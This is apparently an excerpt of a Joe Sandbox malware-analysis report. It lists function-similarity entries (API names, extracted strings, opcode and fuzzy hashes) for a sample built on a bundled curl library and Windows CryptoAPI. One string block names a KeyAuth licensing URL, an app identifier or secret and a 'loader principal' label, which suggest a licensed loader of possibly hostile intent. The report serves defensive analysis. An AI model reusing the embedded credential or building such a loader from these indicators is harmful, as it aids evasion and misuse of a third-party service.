                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0000021C,-00000008,00000000,?,?,00007FF7E5A1C5C8,?,?,?,?,?,?,00007FF7E5A3380E), ref: 00007FF7E5A1C7AD
                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7E5A1C90C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _strdupfreemalloc
                                            • String ID: %c%c%c%c$%c%c%c=$%c%c==
                                            • API String ID: 3985033223-3943651191
                                            • Opcode ID: d4663184589d98a712ad90b88dcd5440e845ddca40feda83b796be39e2ad880e
                                            • Instruction ID: f2e96b246465b7dbc70824ab5dd217ab85dda5ef9152c1c6d12bf5ced5ce41a1
                                            • Opcode Fuzzy Hash: d4663184589d98a712ad90b88dcd5440e845ddca40feda83b796be39e2ad880e
                                            • Instruction Fuzzy Hash: 4B910972B086E585E721AB25A5207BEAF90EF45F94F884232DBAD877D5CF3CD4008711
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: calloc$ErrorLastbind
                                            • String ID: bind() failed; %s
                                            • API String ID: 2604820300-1141498939
                                            • Opcode ID: 043503e0fdb1e12a905a901aa78c990b7d9c545350290c38aea68328abc36be4
                                            • Instruction ID: 14464c179413579c46f2a0476ee4ea66a28c5030d530528c0c6973ee3e3538e1
                                            • Opcode Fuzzy Hash: 043503e0fdb1e12a905a901aa78c990b7d9c545350290c38aea68328abc36be4
                                            • Instruction Fuzzy Hash: 1551E372B0878A86FB14AB25D4657A96BA0FF04F84F444036CB4D87781DF3CE451C721
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: calloc$ErrorLastbind
                                            • String ID: bind() failed; %s
                                            • API String ID: 2604820300-1141498939
                                            • Opcode ID: 5e9d399451e69d20be855dd8e9b27b5fe3cdf2e55046a58bcd62b973cec69776
                                            • Instruction ID: 5629d13fe664586feec108905ad379556a1c1444f11033c9cd5c8196ce11b44f
                                            • Opcode Fuzzy Hash: 5e9d399451e69d20be855dd8e9b27b5fe3cdf2e55046a58bcd62b973cec69776
                                            • Instruction Fuzzy Hash: E3519536B0878E82FB14AB25D461BB9AAA4FF44F84F844036CE4D87785DF3CE4518762
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %2I64d.%0I64dG$%2I64d.%0I64dM$%4I64dG$%4I64dM$%4I64dP$%4I64dT$%4I64dk$%5I64d
                                            • API String ID: 0-2102732564
                                            • Opcode ID: 1a402775ebe9d7af04e26a2663a3cff6c5ec690d9225f72786fb014b8e9cfb9a
                                            • Instruction ID: 4bc900d1ace5de0d40b3a70b6c00283da054240cc54b5167f641355e1e09fa30
                                            • Opcode Fuzzy Hash: 1a402775ebe9d7af04e26a2663a3cff6c5ec690d9225f72786fb014b8e9cfb9a
                                            • Instruction Fuzzy Hash: 2421D195F0994E83FE14F7D5A521FF48AA24F48F80EC44033E90E87391DEBC6542C662
                                            APIs
                                            Strings
                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF7E5A4016B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: DebugDebuggerErrorLastOutputPresentStringmemset
                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                            • API String ID: 1848478996-631824599
                                            • Opcode ID: ab1929773185d78aa00c1a2a7ebb499de6df1f4eca2485d34b4072589dd37bee
                                            • Instruction ID: ac255b1e720607d1c4e3e0483edd8447f307252bfaf62f6df3ae0ea8701d4f3b
                                            • Opcode Fuzzy Hash: ab1929773185d78aa00c1a2a7ebb499de6df1f4eca2485d34b4072589dd37bee
                                            • Instruction Fuzzy Hash: C5115B32B14B4A93E744AB66D5607A966E0FF04B41F80413AC64DC6A50EF3CE464C722
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: Crypt$Context$Release$AcquireRandom
                                            • String ID: @
                                            • API String ID: 2916321625-2766056989
                                            • Opcode ID: c7f578bda8b6bce57ac1e3404d80283eda79a9cd9b89e485504ba2bfd3618192
                                            • Instruction ID: 79a33c3c7fd4e3d7eb9cf4eeda603c0267d9c82039b587d019f8a3db2b6f06a4
                                            • Opcode Fuzzy Hash: c7f578bda8b6bce57ac1e3404d80283eda79a9cd9b89e485504ba2bfd3618192
                                            • Instruction Fuzzy Hash: 5EF0A465B08A8582E7209B61F85473AEB60FFC8FE4F844032DE8D87668DF7CC0858B11
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %ld$(nil)$(nil)$.%ld$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                            • API String ID: 0-1379995092
                                            • Opcode ID: 5e1eafa53adae3ce6afb8c9d757bf206f60acaa71a792b37c3c2878a97f52238
                                            • Instruction ID: 5905605c23bb0fd0e7bbe9aeda0c8a0d5817f79fc994d871d5c25691341fe68a
                                            • Opcode Fuzzy Hash: 5e1eafa53adae3ce6afb8c9d757bf206f60acaa71a792b37c3c2878a97f52238
                                            • Instruction Fuzzy Hash: 3742F832B28A4A49E7306E349460B79EF91FF45B9CFD44232DA5D876D4DE3CE8418722
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8.1$8117cf7ad254a9a5d0d88f66a496a899a0f91b99fcda9b68c5bcd64eda7e1913$9WIvTVJa9m$https://keyauth.win/api/1.2/$loader principal
                                            • API String ID: 0-256606248
                                            • Opcode ID: 0dfdf05879803bf8175c6789fdbce2eae093a341d9f58156f62145278cda41a9
                                            • Instruction ID: 0e83b5e29443c941d9dec56fc0fc4974f02f17ecfd8323a7f5aaadf75174efaa
                                            • Opcode Fuzzy Hash: 0dfdf05879803bf8175c6789fdbce2eae093a341d9f58156f62145278cda41a9
                                            • Instruction Fuzzy Hash: F7124D21E2DB8649F703A73598116A8EB549FA3BC4F90D337FD58B1962FF396281C205
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: Crypt$Hash$Param$ContextDestroyRelease
                                            • String ID:
                                            • API String ID: 2110207923-0
                                            • Opcode ID: 02d6728af480e93390640167c9fa586169bdde8592af3eb17ab05705ac4cfc00
                                            • Instruction ID: 8c74f0b7ac92132778cd0824f240c6577294bf095ca298b58a2866360beb5c14
                                            • Opcode Fuzzy Hash: 02d6728af480e93390640167c9fa586169bdde8592af3eb17ab05705ac4cfc00
                                            • Instruction Fuzzy Hash: B0014C7660869582EB109FA0E464B2ABB20FF85FC8F944526DB4947A68CF3DD4488A11
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: Crypt$AcquireContextCreateHash
                                            • String ID: @
                                            • API String ID: 1914063823-2766056989
                                            • Opcode ID: d3aecc2a83fcad7f21cce8e17703ccbdcebab1f6873e292a1b1d6d83fa72973c
                                            • Instruction ID: e17968cb2b1b2207993cac6dbe9244eed3d0f5d660ee8f756cbf1d47133ed429
                                            • Opcode Fuzzy Hash: d3aecc2a83fcad7f21cce8e17703ccbdcebab1f6873e292a1b1d6d83fa72973c
                                            • Instruction Fuzzy Hash: 97E04865B1469643F7605BA5E411F26A750FF94F88F844031CF4C4BA58DF3DC1558B15
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: Xbad_function_call@std@@
                                            • String ID:
                                            • API String ID: 1029415015-0
                                            • Opcode ID: c92a89784e0bb41f92a25d6217957aa46eb730cd7c89ea4a0d75b9e7a24e9cc6
                                            • Instruction ID: 3be7669e0fff0e11a63dc1e5367f915c27f9e671beb7b2e15743e78ef4559f73
                                            • Opcode Fuzzy Hash: c92a89784e0bb41f92a25d6217957aa46eb730cd7c89ea4a0d75b9e7a24e9cc6
                                            • Instruction Fuzzy Hash: 3D81BB22B19B9989EB00DB69D4A43EC6BB0EB15F88F94402ADF4D87795DF39D081C361
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4ec087bc7bd37833f0647a48c282789a3b2250800aa32e4b4276ab159c278acc
                                            • Instruction ID: c1756a2c4e6133ee97162744a5e3abdca845b452737fe8f1009caefe40e028b3
                                            • Opcode Fuzzy Hash: 4ec087bc7bd37833f0647a48c282789a3b2250800aa32e4b4276ab159c278acc
                                            • Instruction Fuzzy Hash: 6F61F562B0DB4842DA10DB29E4543B9A3A1E759BD4F90A23ADF5DC7788EF3CE5418310
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a9bc956564b332abba12e54d0044448655734ddf9d44365f360b093ba55ae5c6
                                            • Instruction ID: 2052107c8077091d3cc878d3d88e678c5523c64782c7a56b7a768827f06bf64e
                                            • Opcode Fuzzy Hash: a9bc956564b332abba12e54d0044448655734ddf9d44365f360b093ba55ae5c6
                                            • Instruction Fuzzy Hash: E7F08C29324767BEFE00853B8624FBD5E419BD0B01FB379758C80420CB8AAE5493D714
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6b45453525f5d2fc62c84d77ad13ef48ef9287eb9f94b9dd3c8197f5f60b5b06
                                            • Instruction ID: 6bb8cd8c921ff3c459f23500964d51c07740b7d63019a452bd3458a9b0fc85ff
                                            • Opcode Fuzzy Hash: 6b45453525f5d2fc62c84d77ad13ef48ef9287eb9f94b9dd3c8197f5f60b5b06
                                            • Instruction Fuzzy Hash: 72A00265B459498097105755E560E255650EBD8B557555022C50D45410CD3995458211
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c401d5e77b82380336c64bbbff34b4c62b1207d4b576ecca6d801e95cf74b783
                                            • Instruction ID: 72413962a2dd053ca85989d35f770460977ec9cd3c2d5df513c91844adf9c378
                                            • Opcode Fuzzy Hash: c401d5e77b82380336c64bbbff34b4c62b1207d4b576ecca6d801e95cf74b783
                                            • Instruction Fuzzy Hash: 3CA00121A28C4A90E604AB44A960A34AA64AF55B44B810036C51D81060AF3CA900C222
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: strcmp$strncpy$strchr
                                            • String ID: CALG_3DES$CALG_3DES_112$CALG_AES$CALG_AES_128$CALG_AES_192$CALG_AES_256$CALG_AGREEDKEY_ANY$CALG_CYLINK_MEK$CALG_DES$CALG_DESX$CALG_DH_EPHEM$CALG_DH_SF$CALG_DSS_SIGN$CALG_ECDH$CALG_ECDH_EPHEM$CALG_ECDSA$CALG_ECMQV$CALG_HASH_REPLACE_OWF$CALG_HMAC$CALG_HUGHES_MD5$CALG_MAC$CALG_MD2$CALG_MD4$CALG_MD5$CALG_NO_SIGN$CALG_PCT1_MASTER$CALG_RC2$CALG_RC4$CALG_RC5$CALG_RSA_KEYX$CALG_RSA_SIGN$CALG_SCHANNEL_ENC_KEY$CALG_SCHANNEL_MAC_KEY$CALG_SCHANNEL_MASTER_HASH$CALG_SEAL$CALG_SHA$CALG_SHA1$CALG_SHA_256$CALG_SHA_384$CALG_SHA_512$CALG_SKIPJACK$CALG_SSL2_MASTER$CALG_SSL3_MASTER$CALG_SSL3_SHAMD5$CALG_TEK$CALG_TLS1PRF$CALG_TLS1_MASTER
                                            • API String ID: 1395212091-3550120021
                                            • Opcode ID: a95fb3a32220d5d2373a41e2be5983f02937563951c6669e17548706725ee269
                                            • Instruction ID: c1b73a8aae3ff4022c9d6b489745d361c0ccf8253f0044b13c31c7979968570b
                                            • Opcode Fuzzy Hash: a95fb3a32220d5d2373a41e2be5983f02937563951c6669e17548706725ee269
                                            • Instruction Fuzzy Hash: 54122090F1C55F99FB20B764E960BB9AA55AF50B48FC05033D90ECA1D5EE3CE909D322
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID: %s %s RTSP/1.0CSeq: %ld$%s%s%s%s%s%s%s%s$Accept$Accept-Encoding$Accept-Encoding: %s$Accept: application/sdp$CSeq$CSeq cannot be set as a custom header.$Content-Length$Content-Length: %I64d$Content-Type$Content-Type: application/sdp$Content-Type: text/parameters$Failed sending RTSP request$OPTIONS$Range$Range: %s$Referer$Referer: %s$Refusing to issue an RTSP SETUP without a Transport: header.$Refusing to issue an RTSP request [%s] without a session ID.$Session$Session ID cannot be set as a custom header.$Session: %s$Transport$Transport: %s$User-Agent
                                            • API String ID: 1294909896-2200874227
                                            • Opcode ID: 2ec97d5793b2a055e3b496001f5adaffbf27f7ecb529a76ec01f4e511673b300
                                            • Instruction ID: 1375d8e4af8569e35899c2eb4b2118f8f430a47673a9aa028c55d0b672e11846
                                            • Opcode Fuzzy Hash: 2ec97d5793b2a055e3b496001f5adaffbf27f7ecb529a76ec01f4e511673b300
                                            • Instruction Fuzzy Hash: 9702B425B0978A81FE54BB21A461BBAAB90EF44F84FC40037CE4D97795EF3CE5448322
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$malloc$memcpy$htonl
                                            • String ID: GSSAPI handshake failure (empty security message)$GSSAPI handshake failure (invalid security data)$GSSAPI handshake failure (invalid security layer)
                                            • API String ID: 82385936-242323837
                                            • Opcode ID: 5ccaf9b6bd47add414f92efa479d141dd7631a221141d7cb2d10b0ad0c26a9f5
                                            • Instruction ID: a0abb75a6ed2fa52c8a2dccaeb444718758fff443653d128e706da1bb722ae96
                                            • Opcode Fuzzy Hash: 5ccaf9b6bd47add414f92efa479d141dd7631a221141d7cb2d10b0ad0c26a9f5
                                            • Instruction Fuzzy Hash: 2DC13E32B18A5A86E710AB65E860BADBBA0FF44F98F904036DE4E87B54DF3CD445C711
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: 1355b7a7184f64feaaccd16da42868722d35f25f5e110b8e10d39babc2a5a14d
                                            • Instruction ID: 9f2aaecd83525e639adedd020c47dd5814101516b591616f941e757013d932d2
                                            • Opcode Fuzzy Hash: 1355b7a7184f64feaaccd16da42868722d35f25f5e110b8e10d39babc2a5a14d
                                            • Instruction Fuzzy Hash: 97719135608B86C1D740AF21E9A5BBC7764FF85F99F980136DE8E867148F389199C332
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy$_dclass
                                            • String ID: array$number overflow parsing '$object
                                            • API String ID: 1391767211-579821726
                                            • Opcode ID: 2b25a70388e658df558de5c10f1f6de355e433b31a00a9922361f82aacf7a162
                                            • Instruction ID: c7d4e3693a4175b594e726d7ce12952604a23c121159f8f3f5ab8debf731ee5b
                                            • Opcode Fuzzy Hash: 2b25a70388e658df558de5c10f1f6de355e433b31a00a9922361f82aacf7a162
